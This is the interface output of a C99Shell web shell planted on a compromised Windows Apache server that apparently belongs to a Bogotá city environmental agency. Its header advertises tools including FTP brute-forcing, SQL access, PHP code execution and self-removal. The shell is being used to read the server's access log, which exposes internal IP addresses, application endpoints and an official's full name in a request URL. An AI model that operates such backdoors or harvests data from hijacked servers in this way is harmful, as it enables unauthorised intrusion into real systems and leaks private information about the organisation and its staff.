!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.10.14.log (605.07 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [14/Oct/2023:00:01:01 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.179 - - [14/Oct/2023:00:01:30 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/Tibanica-B-50x28.jpg HTTP/1.1" 200 1329
172.22.2.4 - - [14/Oct/2023:00:00:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:00:01:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60175
186.169.213.107 - - [14/Oct/2023:00:04:43 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 465952
201.245.192.253 - - [14/Oct/2023:00:04:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
52.167.144.139 - - [14/Oct/2023:00:05:29 -0500] "GET /BLA/resoluciones/AUTOS%202023/0464.pdf HTTP/1.1" 200 463906
199.16.157.182 - - [14/Oct/2023:00:05:31 -0500] "GET /images/liberacion-tinguas.jpg HTTP/1.1" 200 75984
199.16.157.181 - - [14/Oct/2023:00:05:31 -0500] "GET /images/liberacion-tinguas.jpg HTTP/1.1" 200 75984
199.16.157.183 - - [14/Oct/2023:00:05:31 -0500] "GET /mas-de-1300-tinguas-fueron-recuperadas-en-epoca-migratoria-en-bogota.html HTTP/1.1" 200 724
199.16.157.180 - - [14/Oct/2023:00:05:32 -0500] "GET /images/liberacion-tinguas.jpg HTTP/1.1" 200 75984
66.249.66.19 - - [14/Oct/2023:00:05:57 -0500] "GET /BLA/resoluciones/Autos%202008/0941.pdf HTTP/1.1" 200 110340
66.249.66.21 - - [14/Oct/2023:00:05:57 -0500] "GET /robots.txt HTTP/1.1" 404 1018
186.154.32.4 - - [14/Oct/2023:00:06:00 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.154.32.4 - - [14/Oct/2023:00:06:00 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.154.32.4 - - [14/Oct/2023:00:06:00 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.154.32.4 - - [14/Oct/2023:00:06:00 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.154.32.4 - - [14/Oct/2023:00:06:00 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.154.32.4 - - [14/Oct/2023:00:06:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [14/Oct/2023:00:06:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [14/Oct/2023:00:06:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20301%20AL%20400/RESOLUCION%200328%20DE%202007.pdf HTTP/1.1" 200 485487
186.154.32.4 - - [14/Oct/2023:00:06:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.154.32.4 - - [14/Oct/2023:00:06:20 -0500] "POST /appsia/controlador HTTP/1.1" 200 7775
40.77.167.230 - - [14/Oct/2023:00:06:45 -0500] "GET /Publicaciones/2023EE214578.pdf HTTP/1.1" 404 228
186.154.32.4 - - [14/Oct/2023:00:07:56 -0500] "POST /appsia/controlador HTTP/1.1" 200 6636
186.154.32.4 - - [14/Oct/2023:00:07:57 -0500] "POST /appsia/controlador HTTP/1.1" 200 10612
186.154.32.4 - - [14/Oct/2023:00:07:59 -0500] "POST /appsia/controlador HTTP/1.1" 200 75886
40.77.189.106 - - [14/Oct/2023:00:08:24 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
172.22.2.4 - - [14/Oct/2023:00:06:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [14/Oct/2023:00:08:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2003.pdf HTTP/1.1" 200 442985
186.154.32.4 - - [14/Oct/2023:00:08:35 -0500] "POST /appsia/controlador HTTP/1.1" 200 7775
186.154.32.4 - - [14/Oct/2023:00:08:40 -0500] "POST /appsia/controlador HTTP/1.1" 200 6636
186.154.32.4 - - [14/Oct/2023:00:08:42 -0500] "POST /appsia/controlador HTTP/1.1" 200 11003
186.154.32.4 - - [14/Oct/2023:00:08:46 -0500] "POST /appsia/controlador HTTP/1.1" 200 75939
172.22.2.4 - - [14/Oct/2023:00:07:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54982
186.154.32.4 - - [14/Oct/2023:00:09:19 -0500] "POST /appsia/controlador HTTP/1.1" 200 7775
186.154.32.4 - - [14/Oct/2023:00:09:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 6636
186.154.32.4 - - [14/Oct/2023:00:09:26 -0500] "POST /appsia/controlador HTTP/1.1" 200 10612
186.154.32.4 - - [14/Oct/2023:00:09:29 -0500] "POST /appsia/controlador HTTP/1.1" 200 75887
66.249.66.19 - - [14/Oct/2023:00:09:36 -0500] "GET /Publicaciones/2023EE225876.pdf HTTP/1.1" 404 228
201.245.192.253 - - [14/Oct/2023:00:09:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
186.154.32.4 - - [14/Oct/2023:00:10:04 -0500] "POST /appsia/controlador HTTP/1.1" 200 7775
186.154.32.4 - - [14/Oct/2023:00:10:06 -0500] "POST /appsia/controlador HTTP/1.1" 200 5231
186.154.32.4 - - [14/Oct/2023:00:10:10 -0500] "GET /appsia/controlador?comando=regresar&id=3079395&funcionario=JAVIER+CIFUENTES+ALVAREZ&desde=3079395&hasta=3079395&version=3079395 HTTP/1.1" 200 7775
186.154.32.4 - - [14/Oct/2023:00:10:11 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.154.32.4 - - [14/Oct/2023:00:10:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
172.22.2.4 - - [14/Oct/2023:00:08:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59429
216.245.221.92 - - [14/Oct/2023:00:11:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [14/Oct/2023:00:12:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3867.pdf HTTP/1.1" 200 1233173
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/Oct/2023:00:12:40 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/Oct/2023:00:12:41 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [14/Oct/2023:00:12:41 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [14/Oct/2023:00:12:41 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [14/Oct/2023:00:12:41 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [14/Oct/2023:00:12:41 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [14/Oct/2023:00:12:41 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [14/Oct/2023:00:12:41 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
66.249.66.20 - - [14/Oct/2023:00:13:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6625.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/Oct/2023:00:12:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.19 - - [14/Oct/2023:00:14:18 -0500] "GET /BLA/resoluciones/Autos%202008/1701.pdf HTTP/1.1" 200 98707
201.245.192.253 - - [14/Oct/2023:00:14:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
152.61.192.232 - - [14/Oct/2023:00:14:47 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2023:00:13:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
216.245.221.92 - - [14/Oct/2023:00:16:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:00:17:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42775
201.245.192.253 - - [14/Oct/2023:00:18:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41114
199.16.157.180 - - [14/Oct/2023:00:18:42 -0500] "GET /images/plaguicidas-1_optimized.jpeg HTTP/1.1" 200 50710
199.16.157.183 - - [14/Oct/2023:00:18:42 -0500] "GET /images/plaguicidas-1_optimized.jpeg HTTP/1.1" 200 50710
199.16.157.182 - - [14/Oct/2023:00:18:42 -0500] "GET /bogota-responsable-con-los-plaguicidas-campana-para-proteger-a-la-fauna-y-flora-de-bogota-ante-un-uso-inadecuado-de-estas-sustancias.html HTTP/1.1" 200 1109
40.77.167.28 - - [14/Oct/2023:00:19:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1460.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Oct/2023:00:19:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:00:18:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [14/Oct/2023:00:20:08 -0500] "GET /BLA/resoluciones/Autos%202008/2153.pdf HTTP/1.1" 200 299198
40.77.167.70 - - [14/Oct/2023:00:20:25 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
66.249.66.20 - - [14/Oct/2023:00:20:36 -0500] "GET /BLA/resoluciones/AUTOS%202009/2293.pdf HTTP/1.1" 200 298516
172.22.2.4 - - [14/Oct/2023:00:19:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
216.245.221.92 - - [14/Oct/2023:00:21:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [14/Oct/2023:00:21:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1141.pdf HTTP/1.1" 200 855636
66.249.66.20 - - [14/Oct/2023:00:23:19 -0500] "GET /resoluciones/RESOLUCIONES%202009/7425.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [14/Oct/2023:00:24:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:00:24:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [14/Oct/2023:00:25:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0518.pdf HTTP/1.1" 200 687426
216.245.221.92 - - [14/Oct/2023:00:26:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:00:25:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57802
201.245.192.253 - - [14/Oct/2023:00:27:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42775
201.245.192.253 - - [14/Oct/2023:00:28:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41114
66.249.66.20 - - [14/Oct/2023:00:29:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202801%20AL%202900/RESOLUCION%202873%20DE%202007.pdf HTTP/1.1" 200 351498
201.245.192.253 - - [14/Oct/2023:00:29:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
66.249.66.19 - - [14/Oct/2023:00:30:25 -0500] "GET /BLA/resoluciones/AUTOS%202011/5753.pdf HTTP/1.1" 200 201036
152.61.128.50 - - [14/Oct/2023:00:30:37 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Oct/2023:00:31:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:00:30:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:00:30:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59813
66.249.73.69 - - [14/Oct/2023:00:32:57 -0500] "GET /como-obtener-el-certificado-de-estado-de-conservacion-ambiental-ceca.html HTTP/1.1" 304 -
201.245.192.253 - - [14/Oct/2023:00:34:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
34.147.52.39 - - [14/Oct/2023:00:35:03 -0500] "GET /caminatas-ecologicas-un-plan-imperdible-para-octubre.html HTTP/1.1" 200 747
216.245.221.92 - - [14/Oct/2023:00:36:01 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.195 - - [14/Oct/2023:00:37:04 -0500] "GET /Publicaciones/2023EE236866.pdf HTTP/1.1" 200 761066
80.76.51.163 - - [14/Oct/2023:00:37:14 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2023:00:35:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:00:37:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42775
201.245.192.253 - - [14/Oct/2023:00:38:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41114
199.16.157.181 - - [14/Oct/2023:00:39:22 -0500] "GET /images/pl%C3%A1sticos%20foto%201..jpg HTTP/1.1" 404 1034
201.245.192.253 - - [14/Oct/2023:00:39:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
216.245.221.92 - - [14/Oct/2023:00:41:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:00:44:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:00:43:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:00:43:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60531
216.245.221.92 - - [14/Oct/2023:00:46:01 -0500] "HEAD / HTTP/1.1" 200 -
168.119.253.85 - - [14/Oct/2023:00:47:39 -0500] "GET / HTTP/1.1" 200 4720
168.119.253.85 - - [14/Oct/2023:00:47:41 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2023:00:47:48 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17583
152.61.192.232 - - [14/Oct/2023:00:48:21 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [14/Oct/2023:00:48:22 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [14/Oct/2023:00:48:22 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [14/Oct/2023:00:49:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
64.124.8.51 - - [14/Oct/2023:00:51:57 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 304 -
64.124.8.51 - - [14/Oct/2023:00:51:59 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 304 -
201.245.192.253 - - [14/Oct/2023:00:54:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
66.249.66.21 - - [14/Oct/2023:00:55:08 -0500] "GET /Residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 200 12356716
47.128.28.99 - - [14/Oct/2023:00:55:24 -0500] "GET /caminatas-ecologicas-un-plan-imperdible-para-octubre.html HTTP/1.1" 200 747
172.22.2.4 - - [14/Oct/2023:00:55:36 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [14/Oct/2023:00:55:37 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%202%20del%2021%20de%20septiembre%20de%202014.pdf HTTP/1.1" 200 143376
47.128.48.88 - - [14/Oct/2023:00:55:50 -0500] "GET /robots.txt HTTP/1.1" 404 1034
147.160.184.138 - - [14/Oct/2023:00:56:16 -0500] "GET /galeria/galeria/fotos/Humedal-Vaca3P.jpg HTTP/1.1" 200 38460
201.221.172.245 - - [14/Oct/2023:00:58:51 -0500] "GET /kwssiamovil/sm/des/cjson/pre?f=5&x=U2FsdGVkX19vpnVF0nGKqtyvKUUNkEhKq88669L91bXFJyEn1vsy1xIOXVn/GyYw HTTP/1.1" 200 96695
201.245.192.253 - - [14/Oct/2023:00:59:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
66.249.73.69 - - [14/Oct/2023:01:00:15 -0500] "GET /los-pies-descalzos-que-recorrieron-chinavita-boyaca-y-que-hoy-siembran-esperanza-en-bogota.html HTTP/1.1" 304 -
172.22.2.4 - - [14/Oct/2023:00:58:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2023:01:01:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:00:59:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57802
172.22.2.4 - - [14/Oct/2023:01:03:02 -0500] "GET /BLA/boletinlegal/dns-query?dns=V3UBAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ HTTP/1.1" 406 -
61.135.159.178 - - [14/Oct/2023:01:03:34 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/Oct/2023:01:04:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
216.245.221.92 - - [14/Oct/2023:01:06:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:01:04:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.111.2 - - [14/Oct/2023:01:06:48 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
172.22.2.4 - - [14/Oct/2023:01:05:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57439
40.77.167.235 - - [14/Oct/2023:01:07:52 -0500] "GET /Publicaciones/2023EE237686.pdf HTTP/1.1" 200 231920
201.245.192.253 - - [14/Oct/2023:01:09:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
216.245.221.92 - - [14/Oct/2023:01:11:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.144.31 - - [14/Oct/2023:01:12:12 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2010/&sort=date&order=asc HTTP/1.1" 200 13903
172.22.2.4 - - [14/Oct/2023:01:10:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:01:11:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57089
172.22.2.4 - - [14/Oct/2023:01:13:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
66.249.73.67 - - [14/Oct/2023:01:13:51 -0500] "GET /con-aliados-estrategicos-mujeres-que-reverdecen-continua-brindando-nuevas-oportunidades.html HTTP/1.1" 200 900
201.245.192.253 - - [14/Oct/2023:01:14:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
216.245.221.92 - - [14/Oct/2023:01:16:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.151.0 - - [14/Oct/2023:01:16:23 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2022/ HTTP/1.1" 200 13882
69.63.184.6 - - [14/Oct/2023:01:16:48 -0500] "GET /abierta-convocatoria-para-postular-a-organizaciones-que-desarrollan-actividades-de-voluntariado-ambiental-en-bogota.html HTTP/1.1" 200 880
152.61.128.50 - - [14/Oct/2023:01:17:12 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [14/Oct/2023:01:17:13 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [14/Oct/2023:01:17:14 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [14/Oct/2023:01:17:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42735
201.245.192.253 - - [14/Oct/2023:01:18:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39471
172.22.2.4 - - [14/Oct/2023:01:16:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.136.155 - - [14/Oct/2023:01:18:14 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2009/ HTTP/1.1" 200 13882
172.22.2.4 - - [14/Oct/2023:01:17:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57802
40.77.167.47 - - [14/Oct/2023:01:19:13 -0500] "GET /BLA/resoluciones/AUTOS%202010/3071.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Oct/2023:01:19:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
3.145.56.226 - - [14/Oct/2023:01:20:59 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Oct/2023:01:21:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.69 - - [14/Oct/2023:01:22:45 -0500] "GET /el-agua-recurso-vital-para-la-conservacion-de-los-ecosistemas.html HTTP/1.1" 200 870
172.22.2.4 - - [14/Oct/2023:01:22:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:01:24:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:01:23:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
216.245.221.92 - - [14/Oct/2023:01:26:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:01:27:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42735
201.245.192.253 - - [14/Oct/2023:01:28:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39471
114.119.134.107 - - [14/Oct/2023:01:28:53 -0500] "GET /portalsiaccapacitaciones/Listas%20de%20Asistencia%202016/LISTA%20DE%20ASISTENCIA%20MESA%20PIGA%2027%20JUNIO.pdf HTTP/1.1" 200 278136
201.245.192.253 - - [14/Oct/2023:01:29:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:01:28:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.144.24 - - [14/Oct/2023:01:29:51 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2016/&sort=name&order=asc HTTP/1.1" 200 13903
172.22.2.4 - - [14/Oct/2023:01:28:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60531
216.245.221.92 - - [14/Oct/2023:01:31:01 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.22 - - [14/Oct/2023:01:31:13 -0500] "GET /Publicaciones/2023EE207825.pdf HTTP/1.1" 404 228
114.119.129.235 - - [14/Oct/2023:01:31:24 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2012/ HTTP/1.1" 200 13965
114.119.138.33 - - [14/Oct/2023:01:32:52 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2021/&sort=name&order=desc HTTP/1.1" 200 13943
172.22.2.4 - - [14/Oct/2023:01:33:04 -0500] "POST /BLA/boletinlegal/dns-query HTTP/1.1" 406 -
114.119.142.14 - - [14/Oct/2023:01:34:19 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2010/ HTTP/1.1" 200 13903
201.245.192.253 - - [14/Oct/2023:01:34:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:01:33:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.155.10 - - [14/Oct/2023:01:35:33 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B1995/&sort=date&order=asc HTTP/1.1" 200 13903
216.245.221.92 - - [14/Oct/2023:01:36:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:01:34:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
173.252.107.5 - - [14/Oct/2023:01:36:47 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
114.119.144.15 - - [14/Oct/2023:01:37:09 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/REGISTROS%2B2023/ HTTP/1.1" 200 13956
201.245.192.253 - - [14/Oct/2023:01:37:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42735
201.245.192.253 - - [14/Oct/2023:01:38:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39471
114.119.149.142 - - [14/Oct/2023:01:38:41 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2021/ HTTP/1.1" 200 13944
